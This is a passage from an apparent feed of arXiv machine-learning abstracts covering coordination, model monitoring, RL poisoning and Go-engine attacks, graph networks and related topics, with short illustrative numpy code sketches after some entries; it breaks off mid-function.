In many coordination problems, independently reasoning humans are able to discover mutually compatible policies. In contrast, independently trained self-play policies are often mutually incompatible. Zero-shot coordination (ZSC) has recently been proposed as a new frontier in multi-agent reinforcement learning to address this fundamental issue. Prior work approaches the ZSC problem by assuming players can agree on a shared learning algorithm but not on labels for actions and observations, and proposes other-play as an optimal solution. However, until now, this "label-free" problem has only been informally defined. We formalize this setting as the label-free coordination (LFC) problem by defining the label-free coordination game. We show that other-play is not an optimal solution to the LFC problem as it fails to consistently break ties between incompatible maximizers of the other-play objective. We introduce an extension of the algorithm, other-play with tie-breaking, and prove that it is optimal in the LFC problem and an equilibrium in the LFC game. Since arbitrary tie-breaking is precisely what the ZSC setting aims to prevent, we conclude that the LFC problem does not reflect the aims of ZSC. To address this, we introduce an alternative informal operationalization of ZSC as a starting point for future work.
    TRUST-LAPSE: An Explainable and Actionable Mistrust Scoring Framework for Model Monitoring. (arXiv:2207.11290v2 [cs.LG] UPDATED)
Continuous monitoring of trained ML models to determine when their predictions should and should not be trusted is essential for their safe deployment. Such a framework ought to be high-performing, explainable, post-hoc and actionable. We propose TRUST-LAPSE, a "mistrust" scoring framework for continuous model monitoring. We assess the trustworthiness of each input sample's model prediction using a sequence of latent-space embeddings. Specifically, (a) our latent-space mistrust score estimates mistrust using distance metrics (Mahalanobis distance) and similarity metrics (cosine similarity) in the latent-space and (b) our sequential mistrust score determines deviations in correlations over the sequence of past input representations in a non-parametric, sliding-window based algorithm for actionable continuous monitoring. We evaluate TRUST-LAPSE via two downstream tasks: (1) distributionally shifted input detection, and (2) data drift detection. We evaluate across diverse domains - audio and vision using public datasets and further benchmark our approach on challenging, real-world electroencephalograms (EEG) datasets for seizure detection. Our latent-space mistrust scores achieve state-of-the-art results with AUROCs of 84.1 (vision), 73.9 (audio), and 77.1 (clinical EEGs), outperforming baselines by over 10 points. We expose critical failures in popular baselines that remain insensitive to input semantic content, rendering them unfit for real-world model monitoring. We show that our sequential mistrust scores achieve high drift detection rates; over 90% of the streams show < 20% error for all domains. Through extensive qualitative and quantitative evaluations, we show that our mistrust scores are more robust and provide explainability for easy adoption into practice.
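The latent-space part of the score combines a Mahalanobis distance to the training latents with a cosine-similarity term; the equal-weight combination below is an illustrative assumption, not the paper's exact formula:

```python
import numpy as np

def mistrust_score(z, train_mean, train_cov_inv):
    """Mistrust of a latent embedding z: Mahalanobis distance to the
    training latents plus (1 - cosine similarity) to their mean.
    The 50/50 weighting here is a hypothetical choice for illustration."""
    d = z - train_mean
    maha = float(np.sqrt(d @ train_cov_inv @ d))
    cos = float(z @ train_mean /
                (np.linalg.norm(z) * np.linalg.norm(train_mean) + 1e-12))
    return maha + (1.0 - cos)

rng = np.random.default_rng(0)
Z = rng.normal(loc=1.0, size=(500, 8))        # in-distribution training latents
mu, cov_inv = Z.mean(axis=0), np.linalg.inv(np.cov(Z.T))
```

An in-distribution embedding scores near zero while a shifted one scores high, which is the property the downstream drift detector thresholds on.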
    A Survey on Transformers in Reinforcement Learning. (arXiv:2301.03044v2 [cs.LG] UPDATED)
The Transformer has been considered the dominant neural architecture in NLP and CV, mostly under supervised settings. Recently, a similar surge in the use of Transformers has appeared in the domain of reinforcement learning (RL), but it is faced with unique design choices and challenges brought by the nature of RL. However, the evolution of Transformers in RL has not yet been well unraveled. In this paper, we seek to systematically review motivations and progress on using Transformers in RL, provide a taxonomy of existing works, discuss each sub-field, and summarize future prospects.
    Hiding in Plain Sight: Differential Privacy Noise Exploitation for Evasion-resilient Localized Poisoning Attacks in Multiagent Reinforcement Learning. (arXiv:2307.00268v2 [cs.LG] UPDATED)
    Lately, differential privacy (DP) has been introduced in cooperative multiagent reinforcement learning (CMARL) to safeguard the agents' privacy against adversarial inference during knowledge sharing. Nevertheless, we argue that the noise introduced by DP mechanisms may inadvertently give rise to a novel poisoning threat, specifically in the context of private knowledge sharing during CMARL, which remains unexplored in the literature. To address this shortcoming, we present an adaptive, privacy-exploiting, and evasion-resilient localized poisoning attack (PeLPA) that capitalizes on the inherent DP-noise to circumvent anomaly detection systems and hinder the optimal convergence of the CMARL model. We rigorously evaluate our proposed PeLPA attack in diverse environments, encompassing both non-adversarial and multiple-adversarial contexts. Our findings reveal that, in a medium-scale environment, the PeLPA attack with attacker ratios of 20% and 40% can lead to an increase in average steps to goal by 50.69% and 64.41%, respectively. Furthermore, under similar conditions, PeLPA can result in a 1.4x and 1.6x computational time increase in optimal reward attainment and a 1.18x and 1.38x slower convergence for attacker ratios of 20% and 40%, respectively.
    Human Biophysics as Network Weights: Conditional Generative Models for Dynamic Simulation. (arXiv:2211.01856v3 [cs.LG] UPDATED)
    Simulations of biophysical systems are fundamental for studying physiological mechanisms and developing human machine interfaces. Whilst advanced numerical methods, such as finite element models, can excel in this task, they are extremely computationally expensive to use when generating a large number of simulations or simulating dynamic events with continuously changing structural parameters. We propose an architecture that uses a conditional generative model to interpolate between the numerical model states, dramatically lowering the modeling time while maintaining a high generation accuracy. As a demonstration of this concept, we present BioMime, a hybrid-structured generative model that enables an accurate, ultra-fast, and arbitrarily high temporal-resolution simulation of a specific biophysical system during dynamic changes. This methodology has wide applications in physiological and clinical research as well as in supporting data augmentation strategies for signal analysis, representing a computationally efficient and highly accurate model for biophysical simulations.
    Robust online active learning. (arXiv:2302.00422v5 [stat.ML] UPDATED)
    In many industrial applications, obtaining labeled observations is not straightforward as it often requires the intervention of human experts or the use of expensive testing equipment. In these circumstances, active learning can be highly beneficial in suggesting the most informative data points to be used when fitting a model. Reducing the number of observations needed for model development alleviates both the computational burden required for training and the operational expenses related to labeling. Online active learning, in particular, is useful in high-volume production processes where the decision about the acquisition of the label for a data point needs to be taken within an extremely short time frame. However, despite the recent efforts to develop online active learning strategies, the behavior of these methods in the presence of outliers has not been thoroughly examined. In this work, we investigate the performance of online active linear regression in contaminated data streams. Our study shows that the currently available query strategies are prone to sample outliers, whose inclusion in the training set eventually degrades the predictive performance of the models. To address this issue, we propose a solution that bounds the search area of a conditional D-optimal algorithm and uses a robust estimator. Our approach strikes a balance between exploring unseen regions of the input space and protecting against outliers. Through numerical simulations, we show that the proposed method is effective in improving the performance of online active learning in the presence of outliers, thus expanding the potential applications of this powerful tool.
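The proposed fix, bounding the search area of a conditional D-optimal strategy, can be sketched as a two-part query rule: reject candidate points outside a trusted region, then query only on high D-optimality leverage. The norm-ball bound and ridge term below are illustrative assumptions, and the paper's robust estimator is omitted:

```python
import numpy as np

def query_decision(x, X_train, bound, threshold):
    """Bounded conditional D-optimal query rule for online active learning.

    Label x only if it lies inside a trusted region (the outlier guard) AND
    its leverage x^T (X^T X)^{-1} x -- the D-optimality gain -- is large."""
    if np.linalg.norm(x) > bound:            # outside the bounded search area
        return False
    M_inv = np.linalg.inv(X_train.T @ X_train
                          + 1e-6 * np.eye(X_train.shape[1]))  # ridge for stability
    return float(x @ M_inv @ x) > threshold

# training set so far: 50 points along the first input direction only
X_train = np.tile(np.array([[1.0, 0.0]]), (50, 1))
```

Without the bound, an extreme outlier would have the highest leverage of all and would always be queried, which is exactly the failure mode the abstract describes for unbounded D-optimal strategies.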
    Learning Graph ARMA Processes from Time-Vertex Spectra. (arXiv:2302.06887v2 [stat.ML] UPDATED)
    The modeling of time-varying graph signals as stationary time-vertex stochastic processes permits the inference of missing signal values by efficiently employing the correlation patterns of the process across different graph nodes and time instants. In this study, we propose an algorithm for computing graph autoregressive moving average (graph ARMA) processes based on learning the joint time-vertex power spectral density of the process from its incomplete realizations for the task of signal interpolation. Our solution relies on first roughly estimating the joint spectrum of the process from partially observed realizations and then refining this estimate by projecting it onto the spectrum manifold of the graph ARMA process through convex relaxations. The initially missing signal values are then estimated based on the learnt model. Experimental results show that the proposed approach achieves high accuracy in time-vertex signal estimation problems.
    Personalization Disentanglement for Federated Learning: An explainable perspective. (arXiv:2306.03570v2 [cs.LG] UPDATED)
Personalized federated learning (PFL) jointly trains a variety of local models through balancing between knowledge sharing across clients and model personalization per client. This paper addresses PFL by explicitly disentangling latent representations into two parts to capture the shared knowledge and client-specific personalization, which leads to more reliable and effective PFL. The disentanglement is achieved by a novel Federated Dual Variational Autoencoder (FedDVA), which employs two encoders to infer the two types of representations. FedDVA can produce a better understanding of the trade-off between global knowledge sharing and local personalization in PFL. Moreover, it can be integrated with existing FL methods and turn them into personalized models for heterogeneous downstream tasks. Extensive experiments validate the advantages of disentanglement and show that models trained with disentangled representations substantially outperform vanilla methods.
    Revisiting Generalized p-Laplacian Regularized Framelet GCNs: Convergence, Energy Dynamic and Training with Non-Linear Diffusion. (arXiv:2305.15639v3 [cs.LG] UPDATED)
    This paper presents a comprehensive theoretical analysis of the graph p-Laplacian regularized framelet network (pL-UFG) to establish a solid understanding of its properties. We conduct a convergence analysis on pL-UFG, addressing the gap in the understanding of its asymptotic behaviors. Further by investigating the generalized Dirichlet energy of pL-UFG, we demonstrate that the Dirichlet energy remains non-zero throughout convergence, ensuring the avoidance of over-smoothing issues. Additionally, we elucidate the energy dynamic perspective, highlighting the synergistic relationship between the implicit layer in pL-UFG and graph framelets. This synergy enhances the model's adaptability to both homophilic and heterophilic data. Notably, we reveal that pL-UFG can be interpreted as a generalized non-linear diffusion process, thereby bridging the gap between pL-UFG and differential equations on the graph. Importantly, these multifaceted analyses lead to unified conclusions that offer novel insights for understanding and implementing pL-UFG, as well as other graph neural network (GNN) models. Finally, based on our dynamic analysis, we propose two novel pL-UFG models with manually controlled energy dynamics. We demonstrate empirically and theoretically that our proposed models not only inherit the advantages of pL-UFG but also significantly reduce computational costs for training on large-scale graph datasets.
    Adversarial Policies Beat Superhuman Go AIs. (arXiv:2211.00241v4 [cs.LG] UPDATED)
    We attack the state-of-the-art Go-playing AI system KataGo by training adversarial policies against it, achieving a >97% win rate against KataGo running at superhuman settings. Our adversaries do not win by playing Go well. Instead, they trick KataGo into making serious blunders. Our attack transfers zero-shot to other superhuman Go-playing AIs, and is comprehensible to the extent that human experts can implement it without algorithmic assistance to consistently beat superhuman AIs. The core vulnerability uncovered by our attack persists even in KataGo agents adversarially trained to defend against our attack. Our results demonstrate that even superhuman AI systems may harbor surprising failure modes. Example games are available https://goattack.far.ai/.
    A Deep Learning Method for Comparing Bayesian Hierarchical Models. (arXiv:2301.11873v3 [stat.ML] UPDATED)
Bayesian model comparison (BMC) offers a principled approach for assessing the relative merits of competing computational models and propagating uncertainty into model selection decisions. However, BMC is often intractable for the popular class of hierarchical models due to their high-dimensional nested parameter structure. To address this intractability, we propose a deep learning method for performing BMC on any set of hierarchical models which can be instantiated as probabilistic programs. Since our method enables amortized inference, it allows efficient re-estimation of posterior model probabilities and fast performance validation prior to any real-data application. In a series of extensive validation studies, we benchmark the performance of our method against the state-of-the-art bridge sampling method and demonstrate excellent amortized inference across all BMC settings. We then showcase our method by comparing four hierarchical evidence accumulation models that have previously been deemed intractable for BMC due to partly implicit likelihoods. In this application, we corroborate evidence for the recently proposed Lévy flight model of decision-making and show how transfer learning can be leveraged to enhance training efficiency. We provide reproducible code for all analyses and an open-source implementation of our method.
    A kernel Stein test of goodness of fit for sequential models. (arXiv:2210.10741v3 [stat.ML] UPDATED)
    We propose a goodness-of-fit measure for probability densities modeling observations with varying dimensionality, such as text documents of differing lengths or variable-length sequences. The proposed measure is an instance of the kernel Stein discrepancy (KSD), which has been used to construct goodness-of-fit tests for unnormalized densities. The KSD is defined by its Stein operator: current operators used in testing apply to fixed-dimensional spaces. As our main contribution, we extend the KSD to the variable-dimension setting by identifying appropriate Stein operators, and propose a novel KSD goodness-of-fit test. As with the previous variants, the proposed KSD does not require the density to be normalized, allowing the evaluation of a large class of models. Our test is shown to perform well in practice on discrete sequential data benchmarks.
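For intuition, here is a minimal numpy sketch of the standard fixed-dimension KSD that the paper builds on: a V-statistic with an RBF kernel and the Langevin Stein operator, for a 1D model known only up to normalization. The paper's contribution, Stein operators for variable-dimension data, is not implemented here; the sample sizes and bandwidth are illustrative.

```python
import numpy as np

def ksd_vstat(x, score, h=1.0):
    """V-statistic estimate of the kernel Stein discrepancy with an RBF
    kernel k(x,y) = exp(-(x-y)^2 / (2 h^2)) and the Langevin Stein operator.
    Only the score (gradient of the log-density) is needed, so the model
    density never has to be normalized."""
    x = np.asarray(x, dtype=float)
    d = x[:, None] - x[None, :]            # pairwise differences x_i - x_j
    k = np.exp(-d**2 / (2 * h**2))         # kernel matrix
    s = score(x)                           # score values at each sample
    # Stein kernel: u(x,y) = s(x)s(y)k + s(x)dk/dy + s(y)dk/dx + d2k/dxdy
    dk_dx = -d / h**2 * k
    dk_dy = d / h**2 * k
    d2k = (1.0 / h**2 - d**2 / h**4) * k
    u = s[:, None] * s[None, :] * k + s[:, None] * dk_dy \
        + s[None, :] * dk_dx + d2k
    return u.mean()

rng = np.random.default_rng(0)
score_std_normal = lambda x: -x   # score of N(0,1): d/dx log p(x) = -x
ksd_good = ksd_vstat(rng.normal(0.0, 1.0, 300), score_std_normal)
ksd_bad = ksd_vstat(rng.normal(3.0, 1.0, 300), score_std_normal)
```

Samples drawn from the model (here N(0,1)) yield a KSD near zero, while samples from a shifted distribution yield a clearly larger value, which is what the goodness-of-fit test thresholds.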
    Beyond the Snapshot: Brain Tokenized Graph Transformer for Longitudinal Brain Functional Connectome Embedding. (arXiv:2307.00858v2 [q-bio.NC] UPDATED)
Under the framework of network-based neurodegeneration, brain functional connectome (FC)-based Graph Neural Networks (GNN) have emerged as a valuable tool for the diagnosis and prognosis of neurodegenerative diseases such as Alzheimer's disease (AD). However, these models are tailored for brain FC at a single time point instead of characterizing FC trajectory. Discerning how FC evolves with disease progression, particularly at the predementia stages such as cognitively normal individuals with amyloid deposition or individuals with mild cognitive impairment (MCI), is crucial for delineating disease spreading patterns and developing effective strategies to slow down or even halt disease advancement. In this work, we propose the first interpretable framework for brain FC trajectory embedding with application to neurodegenerative disease diagnosis and prognosis, namely Brain Tokenized Graph Transformer (Brain TokenGT). It consists of two modules: 1) Graph Invariant and Variant Embedding (GIVE) for generation of node and spatio-temporal edge embeddings, which were tokenized for downstream processing; 2) Brain Informed Graph Transformer Readout (BIGTR) which augments previous tokens with trainable type identifiers and non-trainable node identifiers and feeds them into a standard transformer encoder for readout. We conducted extensive experiments on two public longitudinal fMRI datasets of the AD continuum for three tasks, including differentiating MCI from controls, predicting dementia conversion in MCI, and classification of amyloid positive or negative cognitively normal individuals. Based on brain FC trajectory, the proposed Brain TokenGT approach outperformed all the other benchmark models and at the same time provided excellent interpretability. The code is available at https://github.com/ZijianD/Brain-TokenGT.git
    Improving Small Language Models on PubMedQA via Generative Data Augmentation. (arXiv:2305.07804v3 [cs.CL] UPDATED)
    Large Language Models (LLMs) have made remarkable advancements in the field of natural language processing. However, their increasing size poses challenges in terms of computational cost. On the other hand, Small Language Models (SLMs) are known for their efficiency, but they often struggle with limited capacity and training data, especially in specific domains. In this paper, we introduce a novel method aimed at improving SLMs in the medical domain using LLM-based generative data augmentation. The objective of our approach is to develop more efficient and capable models that are specifically tailored for specialized applications. Through experiments conducted on the PubMedQA dataset, we demonstrate the effectiveness of LLMs in refining and diversifying existing question-answer pairs. This refinement process leads to improved performance in a significantly smaller model after fine-tuning. Notably, our best SLM, with under 1.6 billion parameters, outperforms the few-shot GPT-4 on the PubMedQA dataset. Our code and generated data are publicly available to facilitate further explorations.
    In-context Autoencoder for Context Compression in a Large Language Model. (arXiv:2307.06945v1 [cs.CL])
    We propose the In-context Autoencoder (ICAE) for context compression in a large language model (LLM). The ICAE has two modules: a learnable encoder adapted with LoRA from an LLM for compressing a long context into a limited number of memory slots, and a fixed decoder which is the target LLM that can condition on the memory slots for various purposes. We first pretrain the ICAE using both autoencoding and language modeling objectives on massive text data, enabling it to generate memory slots that accurately and comprehensively represent the original context. Then, we fine-tune the pretrained ICAE on a small amount of instruct data to enhance its interaction with various prompts for producing desirable responses. Our experimental results demonstrate that the ICAE learned with our proposed pretraining and fine-tuning paradigm can effectively produce memory slots with $4\times$ context compression, which can be well conditioned on by the target LLM to respond to various prompts. The promising results demonstrate significant implications of the ICAE for its novel approach to the long context problem and its potential to reduce computation and memory overheads for LLM inference in practice, suggesting further research effort in context management for an LLM. Our code and data will be released shortly.
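Very loosely, the memory-slot idea can be pictured as cross-attention pooling: a small number of query vectors attend over a long context and return a fixed number of summary vectors. The numpy sketch below illustrates only that shape-level idea; the actual ICAE uses a LoRA-adapted LLM encoder with learned slots, not the random stand-ins used here.

```python
import numpy as np

def softmax(z, axis=-1):
    z = z - z.max(axis=axis, keepdims=True)
    e = np.exp(z)
    return e / e.sum(axis=axis, keepdims=True)

def compress_context(context, slot_queries):
    """Cross-attention pooling: k slot queries attend over the L context
    embeddings, producing k memory-slot vectors with k << L."""
    d = context.shape[-1]
    attn = softmax(slot_queries @ context.T / np.sqrt(d))  # (k, L) weights
    return attn @ context                                  # (k, d) slots

rng = np.random.default_rng(0)
L, k, d = 512, 4, 32                  # hypothetical sizes: 128x compression
context = rng.normal(size=(L, d))     # stand-in for token embeddings
queries = rng.normal(size=(k, d))     # stand-in for learned slot queries
slots = compress_context(context, queries)
```

A downstream decoder would then condition on the four slot vectors instead of the 512 original embeddings, which is the source of the compression.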
    SAN: Inducing Metrizability of GAN with Discriminative Normalized Linear Layer. (arXiv:2301.12811v2 [cs.LG] UPDATED)
    Generative adversarial networks (GANs) learn a target probability distribution by optimizing a generator and a discriminator with minimax objectives. This paper addresses the question of whether such optimization actually provides the generator with gradients that make its distribution close to the target distribution. We derive metrizable conditions, sufficient conditions for the discriminator to serve as the distance between the distributions by connecting the GAN formulation with the concept of sliced optimal transport. Furthermore, by leveraging these theoretical results, we propose a novel GAN training scheme, called slicing adversarial network (SAN). With only simple modifications, a broad class of existing GANs can be converted to SANs. Experiments on synthetic and image datasets support our theoretical results and the SAN's effectiveness as compared to usual GANs. Furthermore, we also apply SAN to StyleGAN-XL, which leads to state-of-the-art FID score amongst GANs for class conditional generation on ImageNet 256$\times$256.
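The sliced-optimal-transport connection rests on comparing distributions through many random 1D projections. As background for that idea (not the SAN training scheme itself), here is a hedged numpy sketch of a Monte-Carlo sliced 2-Wasserstein distance between two equally sized point clouds; the sample counts and projection count are arbitrary.

```python
import numpy as np

def sliced_w2(x, y, n_proj=200, rng=None):
    """Monte-Carlo sliced 2-Wasserstein distance: project both point clouds
    onto random unit directions and compare sorted 1D projections (the 1D
    optimal transport plan is just the sorted pairing)."""
    rng = rng or np.random.default_rng(0)
    d = x.shape[1]
    total = 0.0
    for _ in range(n_proj):
        theta = rng.normal(size=d)
        theta /= np.linalg.norm(theta)       # random direction on the sphere
        px, py = np.sort(x @ theta), np.sort(y @ theta)
        total += np.mean((px - py) ** 2)     # squared 1D W2 via sorting
    return np.sqrt(total / n_proj)

rng = np.random.default_rng(1)
a = rng.normal(size=(400, 5))
b = rng.normal(size=(400, 5))          # same distribution as a
c = rng.normal(size=(400, 5)) + 2.0    # shifted distribution
sw_same = sliced_w2(a, b)
sw_shift = sliced_w2(a, c)
```

Matching distributions give a near-zero distance while a mean shift is clearly detected; SANs constrain the discriminator so that its objective behaves like such a distance.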
    Local Intrinsic Dimensionality Measures for Graphs, with Applications to Graph Embeddings. (arXiv:2208.11986v2 [cs.LG] UPDATED)
    The notion of local intrinsic dimensionality (LID) is an important advancement in data dimensionality analysis, with applications in data mining, machine learning and similarity search problems. Existing distance-based LID estimators were designed for tabular datasets encompassing data points represented as vectors in a Euclidean space. After discussing their limitations for graph-structured data considering graph embeddings and graph distances, we propose NC-LID, a novel LID-related measure for quantifying the discriminatory power of the shortest-path distance with respect to natural communities of nodes as their intrinsic localities. It is shown how this measure can be used to design LID-aware graph embedding algorithms by formulating two LID-elastic variants of node2vec with personalized hyperparameters that are adjusted according to NC-LID values. Our empirical analysis of NC-LID on a large number of real-world graphs shows that this measure is able to point to nodes with high link reconstruction errors in node2vec embeddings better than node centrality metrics. The experimental evaluation also shows that the proposed LID-elastic node2vec extensions improve node2vec by better preserving graph structure in generated embeddings.
    Climate-Invariant Machine Learning. (arXiv:2112.08440v2 [cs.LG] UPDATED)
    Projecting climate change is a generalization problem: we extrapolate the recent past using physical models across past, present, and future climates. Current climate models require representations of processes that occur at scales smaller than model grid size, which have been the main source of model projection uncertainty. Recent machine learning (ML) algorithms hold promise to improve such process representations, but tend to extrapolate poorly to climate regimes they were not trained on. To get the best of the physical and statistical worlds, we propose a new framework -- termed "climate-invariant" ML -- incorporating knowledge of climate processes into ML algorithms, and show that it can maintain high accuracy across a wide range of climate and geographic conditions in three distinct atmospheric models. Our results suggest that explicitly incorporating physical knowledge into data-driven models of Earth system processes can improve their consistency, data efficiency, and generalizability across climate regimes.
    Tensor Completion via Leverage Sampling and Tensor QR Decomposition for Network Latency Estimation. (arXiv:2307.06848v1 [cs.NI])
In this paper, we consider network latency estimation, an important metric of network performance. However, large-scale network latency estimation requires substantial computing time, so we propose a new method that is much faster while maintaining high accuracy. The data of the network nodes form a matrix, and introducing the time dimension yields a tensor model; the entire problem can therefore be summarized as a tensor completion problem. The main idea of our method is to improve the tensor leverage sampling strategy and to introduce tensor QR decomposition into tensor completion. To achieve faster tensor leverage sampling, we replace the tensor singular value decomposition (t-SVD) with tensor CSVD-QR to approximate the t-SVD. To achieve faster completion of the incomplete tensor, we use the tensor $L_{2,1}$-norm rather than the traditional tensor nuclear norm. Furthermore, we introduce tensor QR decomposition into the alternating direction method of multipliers (ADMM) framework. Numerical experiments show that our method is faster than state-of-the-art algorithms with satisfactory accuracy.
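For the matrix analogue of the sampling step, row leverage scores fall out of a reduced QR factorization: the i-th score is the squared norm of row i of Q, and it defines a sampling distribution that favors structurally important rows. The numpy sketch below shows that matrix version only; the paper's tensor CSVD-QR variant is not implemented here.

```python
import numpy as np

def leverage_scores(A):
    """Row leverage scores of A via a reduced QR decomposition A = QR:
    score_i = ||Q[i, :]||^2, which lies in [0, 1] and sums to rank(A)."""
    Q, _ = np.linalg.qr(A)            # Q has orthonormal columns
    return (Q ** 2).sum(axis=1)

rng = np.random.default_rng(0)
A = rng.normal(size=(100, 5))         # tall matrix of, e.g., latency data
lev = leverage_scores(A)
probs = lev / lev.sum()               # sampling distribution over rows
sampled_rows = rng.choice(100, size=20, replace=False, p=probs)
```

Sampling rows with these probabilities is the standard leverage-score strategy; the scores sum to the column rank, so `probs` is a proper distribution.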
    Joint User and Data Detection in Grant-Free NOMA with Attention-based BiLSTM Network. (arXiv:2209.06392v2 [eess.SP] UPDATED)
    We consider the multi-user detection (MUD) problem in uplink grant-free non-orthogonal multiple access (NOMA), where the access point has to identify the total number and correct identity of the active Internet of Things (IoT) devices and decode their transmitted data. We assume that IoT devices use complex spreading sequences and transmit information in a random-access manner following the burst-sparsity model, where some IoT devices transmit their data in multiple adjacent time slots with a high probability, while others transmit only once during a frame. Exploiting the temporal correlation, we propose an attention-based bidirectional long short-term memory (BiLSTM) network to solve the MUD problem. The BiLSTM network creates a pattern of the device activation history using forward and reverse pass LSTMs, whereas the attention mechanism provides essential context to the device activation points. By doing so, a hierarchical pathway is followed for detecting active devices in a grant-free scenario. Then, by utilising the complex spreading sequences, blind data detection for the estimated active devices is performed. The proposed framework does not require prior knowledge of device sparsity levels and channels for performing MUD. The results show that the proposed network achieves better performance compared to existing benchmark schemes.
    Energy-efficient Deployment of Deep Learning Applications on Cortex-M based Microcontrollers using Deep Compression. (arXiv:2205.10369v2 [cs.LG] UPDATED)
Large Deep Neural Networks (DNNs) are the backbone of today's artificial intelligence due to their ability to make accurate predictions when being trained on huge datasets. With advancing technologies, such as the Internet of Things, interpreting large quantities of data generated by sensors is becoming an increasingly important task. However, in many applications not only the predictive performance but also the energy consumption of deep learning models is of major interest. This paper investigates the efficient deployment of deep learning models on resource-constrained microcontroller architectures via network compression. We present a methodology for the systematic exploration of different DNN pruning, quantization, and deployment strategies, targeting different ARM Cortex-M based low-power systems. The exploration allows us to analyze trade-offs between key metrics such as accuracy, memory consumption, execution time, and power consumption. We discuss experimental results on three different DNN architectures and show that we can compress them to below 10% of their original parameter count before their predictive quality decreases. This also allows us to deploy and evaluate them on Cortex-M based microcontrollers.
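The two compression primitives the methodology explores can be sketched in a few lines: global magnitude pruning (zero the smallest weights) and symmetric 8-bit linear quantization. The sparsity target and tensor shapes below are illustrative, not the paper's configuration, and a deployment pipeline would apply these per layer with fine-tuning in between.

```python
import numpy as np

def magnitude_prune(w, sparsity=0.9):
    """Zero the smallest-magnitude entries until `sparsity` fraction is zero."""
    k = int(sparsity * w.size)
    thresh = np.sort(np.abs(w), axis=None)[k - 1]
    return np.where(np.abs(w) <= thresh, 0.0, w)

def quantize_int8(w):
    """Symmetric linear quantization to int8; returns codes and the scale."""
    scale = np.abs(w).max() / 127.0
    q = np.clip(np.round(w / scale), -127, 127).astype(np.int8)
    return q, scale

rng = np.random.default_rng(0)
w = rng.normal(size=(64, 64))              # stand-in for a weight matrix
w_pruned = magnitude_prune(w, 0.9)         # 90% of weights removed
q, scale = quantize_int8(w_pruned)         # 4 bytes/weight -> 1 byte/weight
w_restored = q.astype(np.float32) * scale  # dequantized view for inference
sparsity = (w_pruned == 0).mean()
```

Pruning shrinks the parameter count (matching the "below 10%" regime) while quantization shrinks the per-parameter storage; the rounding error is bounded by half the quantization scale.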
    Generalized Laplacian Regularized Framelet Graph Neural Networks. (arXiv:2210.15092v2 [cs.LG] UPDATED)
    This paper introduces a novel Framelet Graph approach based on p-Laplacian GNN. The proposed two models, named p-Laplacian undecimated framelet graph convolution (pL-UFG) and generalized p-Laplacian undecimated framelet graph convolution (pL-fUFG) inherit the nature of p-Laplacian with the expressive power of multi-resolution decomposition of graph signals. The empirical study highlights the excellent performance of the pL-UFG and pL-fUFG in different graph learning tasks including node classification and signal denoising.
    Declarative Mechanism Design. (arXiv:1912.13122v4 [cs.AI] UPDATED)
Regulation of Multi-Agent Systems (MAS) and Declarative Electronic Institutions (DEIs) was a multidisciplinary research topic of the past decade, involving (physical and software) agents and law since the beginning, but it has recently evolved towards the news-claimed "robot lawyer" since 2016. One of the first proposals for restricting the behaviour of software agents was Electronic Institutions. However, with the recent reformulation of Artificial Neural Networks (ANNs) as Deep Learning (DL), security, privacy, ethical and legal issues regarding the use of DL have raised concerns in the Artificial Intelligence (AI) community. Now that the regulation of MAS is almost correctly addressed, we propose the regulation of Artificial Neural Networks as agent-based training of a special type of regulated Artificial Neural Network that we call an Institutional Neural Network (INN). The main purpose of this paper is to bring attention to Artificial Teaching (AT) and to give a tentative answer showing a proof-of-concept implementation of Regulated Deep Learning (RDL). This paper introduces the former concept and provides sI, a language previously used to model and extend Electronic Institutions declaratively, as a means to regulate the execution of Artificial Neural Networks and their interactions with Artificial Teachers (ATs).
    Efficient Bayesian Policy Reuse with a Scalable Observation Model in Deep Reinforcement Learning. (arXiv:2204.07729v3 [cs.LG] UPDATED)
    Bayesian policy reuse (BPR) is a general policy transfer framework for selecting a source policy from an offline library by inferring the task belief based on some observation signals and a trained observation model. In this paper, we propose an improved BPR method to achieve more efficient policy transfer in deep reinforcement learning (DRL). First, most BPR algorithms use the episodic return as the observation signal that contains limited information and cannot be obtained until the end of an episode. Instead, we employ the state transition sample, which is informative and instantaneous, as the observation signal for faster and more accurate task inference. Second, BPR algorithms usually require numerous samples to estimate the probability distribution of the tabular-based observation model, which may be expensive and even infeasible to learn and maintain, especially when using the state transition sample as the signal. Hence, we propose a scalable observation model based on fitting state transition functions of source tasks from only a small number of samples, which can generalize to any signals observed in the target task. Moreover, we extend the offline-mode BPR to the continual learning setting by expanding the scalable observation model in a plug-and-play fashion, which can avoid negative transfer when faced with new unknown tasks. Experimental results show that our method can consistently facilitate faster and more efficient policy transfer.
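At its core, the BPR belief update is Bayes' rule over source tasks. A toy numpy sketch with hypothetical likelihood values follows; in the paper the likelihoods come from a learned observation model over state-transition samples, whereas here they are simply given.

```python
import numpy as np

def update_belief(belief, likelihoods):
    """One Bayes step: posterior over source tasks is proportional to the
    prior belief times p(observed signal | task)."""
    post = belief * likelihoods
    return post / post.sum()

belief = np.array([1/3, 1/3, 1/3])   # uniform prior over 3 source tasks
# Hypothetical likelihoods of the observed state transition under each
# source task's (learned) transition model
likelihoods = np.array([0.05, 0.60, 0.10])
belief = update_belief(belief, likelihoods)
chosen_policy = int(np.argmax(belief))   # reuse the most probable task's policy
```

Using instantaneous state-transition signals, as the paper advocates, means this update can run at every step rather than once per episode.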
    Learning low-rank latent mesoscale structures in networks. (arXiv:2102.06984v5 [cs.SI] UPDATED)
    It is common to use networks to encode the architecture of interactions between entities in complex systems in the physical, biological, social, and information sciences. To study the large-scale behavior of complex systems, it is useful to examine mesoscale structures in networks as building blocks that influence such behavior. We present a new approach for describing low-rank mesoscale structures in networks, and we illustrate our approach using several synthetic network models and empirical friendship, collaboration, and protein--protein interaction (PPI) networks. We find that these networks possess a relatively small number of `latent motifs' that together can successfully approximate most subgraphs of a network at a fixed mesoscale. We use an algorithm for `network dictionary learning' (NDL), which combines a network-sampling method and nonnegative matrix factorization, to learn the latent motifs of a given network. The ability to encode a network using a set of latent motifs has a wide variety of applications to network-analysis tasks, such as comparison, denoising, and edge inference. Additionally, using a new network denoising and reconstruction (NDR) algorithm, we demonstrate how to denoise a corrupted network by using only the latent motifs that one learns directly from the corrupted network.
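Network dictionary learning combines a network-sampling step with nonnegative matrix factorization (NMF). The NMF half can be sketched with the classic Lee-Seung multiplicative updates on a synthetic low-rank nonnegative matrix; the sampling half and the paper's exact NDL/NDR algorithms are omitted, and the sizes are arbitrary.

```python
import numpy as np

def nmf(X, r, iters=500, rng=None):
    """Approximate X ~ W H with W, H >= 0 via Lee-Seung multiplicative
    updates; in NDL, columns of W play the role of latent motifs."""
    rng = rng or np.random.default_rng(0)
    m, n = X.shape
    W = rng.random((m, r)) + 0.1     # positive initialization
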